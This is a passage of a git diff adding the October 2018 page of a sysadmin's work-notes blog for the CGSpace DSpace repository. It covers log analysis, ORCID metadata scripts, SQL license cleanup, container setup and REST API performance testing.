+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-10/index.html b/docs/2018-10/index.html
new file mode 100644
index 000000000..0ddb56928
--- /dev/null
+++ b/docs/2018-10/index.html
@@ -0,0 +1,710 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2018" />
+<meta property="og:description" content="2018-10-01
+
+Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
+I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-10/" />
+<meta property="article:published_time" content="2018-10-01T22:31:54+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2018"/>
+<meta name="twitter:description" content="2018-10-01
+
+Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
+I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-10/",
+  "wordCount": "4518",
+  "datePublished": "2018-10-01T22:31:54+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-10/">
+
+    <title>October, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-10/">October, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-10-01">2018-10-01</h2>
+<ul>
+<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li>
+<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li>
+</ul>
+<h2 id="2018-10-03">2018-10-03</h2>
+<ul>
+<li>I see Moayad was busy collecting item views and downloads from CGSpace yesterday:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    933 40.77.167.90
+    971 95.108.181.88
+   1043 41.204.190.40
+   1454 157.55.39.54
+   1538 207.46.13.69
+   1719 66.249.64.61
+   2048 50.116.102.77
+   4639 66.249.64.59
+   4736 35.237.175.180
+ 150362 34.218.226.147
+</code></pre><ul>
+<li>Of those, about 20% were HTTP 500 responses (!):</li>
+</ul>
+<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | grep 34.218.226.147 | awk &#39;{print $9}&#39; | sort -n | uniq -c
+ 118927 200
+  31435 500
+</code></pre><ul>
+<li>I added Phil Thornton and Sonal Henson&rsquo;s ORCID identifiers to the controlled vocabulary for <code>cg.creator.orcid</code> and then re-generated the names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
+$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
+</code></pre><ul>
+<li>I found a new corner case error that I need to check, given <em>and</em> family names deactivated:</li>
+</ul>
+<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
+Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
+</code></pre><ul>
+<li>It appears to be Jim Lorenzen&hellip; I need to check that later!</li>
+<li>I merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/390">#390</a>)</li>
+<li>Linode sent another alert about CPU usage on CGSpace (linode18) this evening</li>
+<li>It seems that Moayad is making quite a lot of requests today:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1594 157.55.39.160
+   1627 157.55.39.173
+   1774 136.243.6.84
+   4228 35.237.175.180
+   4497 70.32.83.92
+   4856 66.249.64.59
+   7120 50.116.102.77
+  12518 138.201.49.199
+  87646 34.218.226.147
+ 111729 213.139.53.62
+</code></pre><ul>
+<li>But in super positive news, he says they are using my new <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> and it&rsquo;s MUCH faster than using Atmire CUA&rsquo;s internal &ldquo;restlet&rdquo; API</li>
+<li>I don&rsquo;t recognize the <code>138.201.49.199</code> IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:</li>
+</ul>
+<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /[a-z]+&#39; | sort | uniq -c
+   8324 GET /bitstream
+   4193 GET /handle
+</code></pre><ul>
+<li>Suspiciously, it&rsquo;s only grabbing the CGIAR System Office community (handle prefix 10947):</li>
+</ul>
+<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /handle/[0-9]{5}&#39; | sort | uniq -c
+      7 GET /handle/10568
+   4186 GET /handle/10947
+</code></pre><ul>
+<li>The user agent is suspicious too:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+</code></pre><ul>
+<li>It&rsquo;s clearly a bot and it&rsquo;s not re-using its Tomcat session, so I will add its IP to the nginx bad bot list</li>
+<li>I looked in Solr&rsquo;s statistics core and these hits were actually all counted as <code>isBot:false</code> (of course)&hellip; hmmm</li>
+<li>I tagged all of Sonal and Phil&rsquo;s items with their ORCID identifiers on CGSpace using my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Where <code>2018-10-03-add-orcids.csv</code> contained:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Henson, Sonal P.&#34;,Sonal Henson: 0000-0002-2002-5462
+&#34;Henson, S.&#34;,Sonal Henson: 0000-0002-2002-5462
+&#34;Thornton, P.K.&#34;,Philip Thornton: 0000-0002-1854-0182
+&#34;Thornton, Philip K&#34;,Philip Thornton: 0000-0002-1854-0182
+&#34;Thornton, Phil&#34;,Philip Thornton: 0000-0002-1854-0182
+&#34;Thornton, Philip K.&#34;,Philip Thornton: 0000-0002-1854-0182
+&#34;Thornton, Phillip&#34;,Philip Thornton: 0000-0002-1854-0182
+&#34;Thornton, Phillip K.&#34;,Philip Thornton: 0000-0002-1854-0182
+</code></pre><h2 id="2018-10-04">2018-10-04</h2>
+<ul>
+<li>Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)</li>
+<li>Every item has at least a <code>LICENSE</code> bundle, and some have a <code>THUMBNAIL</code> bundle, but the indexing code is specifically checking for downloads from the <code>ORIGINAL</code> bundle
+<ul>
+<li><a href="https://cgspace.cgiar.org/handle/10568/97460">10568/97460</a> (100550): has a thumbnail bitstream</li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/96112">10568/96112</a> (96736): has only a LICENSE bitstream</li>
+</ul>
+</li>
+<li>I see there are other bundles we might need to pay attention to: <code>TEXT</code>, <code>@_LOGO-COLLECTION_@</code>, <code>@_LOGO-COMMUNITY_@</code>, etc&hellip;</li>
+<li>On a hunch I dropped the statistics table and re-indexed and now those two items above have no downloads</li>
+<li>So it&rsquo;s fixed, but I&rsquo;m not sure why!</li>
+<li>Peter wants to know the number of API requests per month, which was about 250,000 in September (exluding statlet requests):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E &#39;Sep/2018&#39; | grep -c -v &#39;statlets&#39;
+251226
+</code></pre><ul>
+<li>I found a logic error in the dspace-statistics-api <code>indexer.py</code> script that was causing item views to be inserted into downloads</li>
+<li>I tagged version 0.4.2 of the tool and redeployed it on CGSpace</li>
+</ul>
+<h2 id="2018-10-05">2018-10-05</h2>
+<ul>
+<li>Meet with Peter, Abenet, and Sisay to discuss CGSpace meeting in Nairobi and Sisay&rsquo;s work plan</li>
+<li>We agreed that he would do monthly updates of the controlled vocabularies and generate a new one for the top 1,000 AGROVOC terms</li>
+<li>Add a link to <a href="https://cgspace.cgiar.org/explorer/">AReS explorer</a> to the CGSpace homepage introduction text</li>
+</ul>
+<h2 id="2018-10-06">2018-10-06</h2>
+<ul>
+<li>Follow up with AgriKnowledge about including Handle links (<code>dc.identifier.uri</code>) on their item pages</li>
+<li>In July, 2018 they had said their programmers would include the field in the next update of their website software</li>
+<li><a href="https://repository.cimmyt.org/">CIMMYT&rsquo;s DSpace repository</a> is now running DSpace 5.x!</li>
+<li>It&rsquo;s running OAI, but not REST, so I need to talk to Richard about that!</li>
+</ul>
+<h2 id="2018-10-08">2018-10-08</h2>
+<ul>
+<li>AgriKnowledge says they&rsquo;re going to add the <code>dc.identifier.uri</code> to their item view in November when they update their website software</li>
+</ul>
+<h2 id="2018-10-10">2018-10-10</h2>
+<ul>
+<li>Peter noticed that some recently added PDFs don&rsquo;t have thumbnails</li>
+<li>When I tried to force them to be generated I got an error that I&rsquo;ve never seen before:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace filter-media -v -f -i 10568/97613
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf&#39; @ error/constitute.c/ReadImage/412.
+</code></pre><ul>
+<li>I see there was an update to Ubuntu&rsquo;s ImageMagick on 2018-10-05, so maybe something changed or broke?</li>
+<li>I get the same error when forcing <code>filter-media</code> to run on DSpace Test too, so it&rsquo;s gotta be an ImageMagic bug</li>
+<li>The ImageMagick version is currently 8:6.8.9.9-7ubuntu5.13, and there is an <a href="https://usn.ubuntu.com/3785-1/">Ubuntu Security Notice from 2018-10-04</a></li>
+<li>Wow, someone on <a href="https://twitter.com/rosscampbell/status/1048268966819319808">Twitter posted about this breaking his web application</a> (and it was retweeted by the ImageMagick acount!)</li>
+<li>I commented out the line that disables PDF thumbnails in <code>/etc/ImageMagick-6/policy.xml</code>:</li>
+</ul>
+<pre tabindex="0"><code>  &lt;!--&lt;policy domain=&#34;coder&#34; rights=&#34;none&#34; pattern=&#34;PDF&#34; /&gt;--&gt;
+</code></pre><ul>
+<li>This works, but I&rsquo;m not sure what ImageMagick&rsquo;s long-term plan is if they are going to disable ALL image formats&hellip;</li>
+<li>I suppose I need to enable a workaround for this in Ansible?</li>
+</ul>
+<h2 id="2018-10-11">2018-10-11</h2>
+<ul>
+<li>I emailed DuraSpace to update <a href="https://duraspace.org/registry/entry/4188/?gvid=178">our entry in their DSpace registry</a> (the data was still on DSpace 3, JSPUI, etc)</li>
+<li>Generate a list of the top 1500 values for <code>dc.subject</code> so Sisay can start making a controlled vocabulary for it:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
+COPY 1500
+</code></pre><ul>
+<li>Give WorldFish advice about Handles because they are talking to some company called KnowledgeArc who recommends they do not use Handles!</li>
+<li>Last week I emailed Altmetric to ask if their software would notice mentions of our Handle in the format &ldquo;handle:10568/80775&rdquo; because I noticed that the <a href="https://landportal.org/library/resources/handle1056880775/unlocking-farming-potential-bangladesh%E2%80%99-polders">Land Portal does this</a></li>
+<li>Altmetric support responded to say no, but the reason is that Land Portal is doing even more strange stuff by not using <code>&lt;meta&gt;</code> tags in their page header, and using &ldquo;dct:identifier&rdquo; property instead of &ldquo;dc:identifier&rdquo;</li>
+<li>I re-created my local DSpace databse container using <a href="https://github.com/containers/libpod">podman</a> instead of Docker:</li>
+</ul>
+<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
+$ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ sudo podman start dspacedb
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+</code></pre><ul>
+<li>I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository</li>
+<li>I can pull the <code>docker.bintray.io/jfrog/artifactory-oss:latest</code> image, but not start it</li>
+<li>I decided to use a Sonatype Nexus repository instead:</li>
+</ul>
+<pre tabindex="0"><code>$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
+$ sudo podman run --name nexus -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
+</code></pre><ul>
+<li>With a few changes to my local Maven <code>settings.xml</code> it is working well</li>
+<li>Generate a list of the top 10,000 authors for Peter Ballantyne to look through:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
+COPY 10000
+</code></pre><ul>
+<li>CTA uploaded some infographics that are very tall and their thumbnails disrupt the item lists on the front page and in their communities and collections</li>
+<li>I decided to constrain the max height of these to 200px using CSS (<a href="https://github.com/ilri/DSpace/pull/392">#392</a>)</li>
+</ul>
+<h2 id="2018-10-13">2018-10-13</h2>
+<ul>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+<li>Look through Peter&rsquo;s list of 746 author corrections in OpenRefine</li>
+<li>I first facet by blank, trim whitespace, and then check for weird characters that might be indicative of encoding issues with this GREL:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/))
+)
+</code></pre><ul>
+<li>Then I exported and applied them on my local test server:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t CORRECT -m 3
+</code></pre><ul>
+<li>I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay&rsquo;s author controlled vocabulary</li>
+</ul>
+<h2 id="2018-10-14">2018-10-14</h2>
+<ul>
+<li>Merge the authors controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/393">#393</a>), usage rights (<a href="https://github.com/ilri/DSpace/pull/394">#394</a>), and the upstream DSpace 5.x cherry-picks (<a href="https://github.com/ilri/DSpace/pull/395">#394</a>) into our <code>5_x-prod</code> branch</li>
+<li>Switch to new CGIAR LDAP server on CGSpace, as it&rsquo;s been running (at least for authentication) on DSpace Test for the last few weeks, and I think they old one will be deprecated soon (today?)</li>
+<li>Apply Peter&rsquo;s 746 author corrections on CGSpace and DSpace Test using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Run all system updates on CGSpace (linode19) and reboot the server</li>
+<li>After rebooting the server I noticed that Handles are not resolving, and the <code>dspace-handle-server</code> systemd service is not running (or rather, it exited with success)</li>
+<li>Restarting the service with systemd works for a few seconds, then the java process quits</li>
+<li>I suspect that the systemd service type needs to be <code>forking</code> rather than <code>simple</code>, because the service calls the default DSpace <code>start-handle-server</code> shell script, which uses <code>nohup</code> and <code>&amp;</code> to background the java process</li>
+<li>It would be nice if there was a cleaner way to start the service and then just log to the systemd journal rather than all this hiding and log redirecting</li>
+<li>Email the Landportal.org people to ask if they would consider Dublin Core metadata tags in their page&rsquo;s header, rather than the HTML properties they are using in their body</li>
+<li>Peter pointed out that some thumbnails were still not getting generated
+<ul>
+<li>When I tried to generate them manually I noticed that the path to the CMYK profile had changed because Ubuntu upgraded Ghostscript from 9.18 to 9.25 last week&hellip; WTF?</li>
+<li>Looks like I can use <code>/usr/share/ghostscript/current</code> instead of <code>/usr/share/ghostscript/9.25</code>&hellip;</li>
+</ul>
+</li>
+<li>I limited the tall thumbnails even further to 170px because Peter said CTA&rsquo;s were still too tall at 200px (<a href="https://github.com/ilri/DSpace/pull/396">#396</a>)</li>
+</ul>
+<h2 id="2018-10-15">2018-10-15</h2>
+<ul>
+<li>Tomcat on DSpace Test (linode19) has somehow stopped running all the DSpace applications</li>
+<li>I don&rsquo;t see anything in the Catalina logs or <code>dmesg</code>, and the Tomcat manager shows XMLUI, REST, OAI, etc all &ldquo;Running: false&rdquo;</li>
+<li>Actually, now I remember that yesterday when I deployed the latest changes from git on DSpace Test I noticed a syntax error in one XML file when I was doing the discovery reindexing</li>
+<li>I fixed it so that I could reindex, but I guess the rest of DSpace actually didn&rsquo;t start up&hellip;</li>
+<li>Create an account on DSpace Test for Felix from Earlham so he can test COPO submission
+<ul>
+<li>I created a new collection and added him as the administrator so he can test submission</li>
+<li>He said he actually wants to test creation of communities, collections, etc, so I had to make him a super admin for now</li>
+<li>I told him we need to think about the workflow more seriously in the future</li>
+</ul>
+</li>
+<li>I ended up having some issues with podman and went back to Docker, so I had to re-create my containers:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
+$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+</code></pre><h2 id="2018-10-16">2018-10-16</h2>
+<ul>
+<li>Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN &#39;dc&#39; WHEN metadata_schema_id=2 THEN &#39;cg&#39; END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
+</code></pre><ul>
+<li>Talking to the CodeObia guys about the REST API I started to wonder why it&rsquo;s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it</li>
+<li>Interestingly, the speed doesn&rsquo;t get better after you request the same thing multiple times–it&rsquo;s consistently bad on both CGSpace and DSpace Test!</li>
+</ul>
+<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
+...
+0.35s user 0.06s system 1% cpu 25.133 total
+0.31s user 0.04s system 1% cpu 25.223 total
+0.27s user 0.06s system 1% cpu 27.858 total
+0.20s user 0.05s system 1% cpu 23.838 total
+0.30s user 0.05s system 1% cpu 24.301 total
+
+$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
+...
+0.22s user 0.03s system 1% cpu 17.248 total
+0.23s user 0.02s system 1% cpu 16.856 total
+0.23s user 0.04s system 1% cpu 16.460 total
+0.24s user 0.04s system 1% cpu 21.043 total
+0.22s user 0.04s system 1% cpu 17.132 total
+</code></pre><ul>
+<li>I should note that at this time CGSpace is using Oracle Java and DSpace Test is using OpenJDK (both version 8)</li>
+<li>I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?</li>
+<li>I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!</li>
+</ul>
+<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
+...
+0.20s user 0.03s system 0% cpu 25.017 total
+0.23s user 0.02s system 1% cpu 23.299 total
+0.24s user 0.02s system 1% cpu 22.496 total
+0.22s user 0.03s system 1% cpu 22.720 total
+0.23s user 0.03s system 1% cpu 22.632 total
+</code></pre><ul>
+<li>If I make a request without the expands it is ten time faster:</li>
+</ul>
+<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0&#39;
+...
+0.20s user 0.03s system 7% cpu 3.098 total
+0.22s user 0.03s system 8% cpu 2.896 total
+0.21s user 0.05s system 9% cpu 2.787 total
+0.23s user 0.02s system 8% cpu 2.896 total
+</code></pre><ul>
+<li>I sent a mail to dspace-tech to ask how to profile this&hellip;</li>
+</ul>
+<h2 id="2018-10-17">2018-10-17</h2>
+<ul>
+<li>I decided to update most of the existing metadata values that we have in <code>dc.rights</code> on CGSpace to be machine readable in SPDX format (with Creative Commons version if it was included)</li>
+<li>Most of the are from Bioversity, and I asked Maria for permission before updating them</li>
+<li>I manually went through and looked at the existing values and updated them in several batches:</li>
+</ul>
+<pre tabindex="0"><code>UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%CC BY %&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-ND%&#39; AND text_value LIKE &#39;%by-nc-nd%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-SA%&#39; AND text_value LIKE &#39;%by-nc-sa%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value LIKE &#39;%/by/%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%/by/%&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-2.5&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
+&#39;%/by-nc%&#39; AND text_value LIKE &#39;%2.5%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%/by-nc%&#39; AND text_value LIKE &#39;%4.0%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial-ShareAlike%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution %&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
+UPDATE metadatavalue SET text_value=&#39;CC-BY&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value NOT LIKE &#39;%CC0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%CC-%&#39;;
+UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
+</code></pre><ul>
+<li>I updated the fields on CGSpace and then started a re-index of Discovery</li>
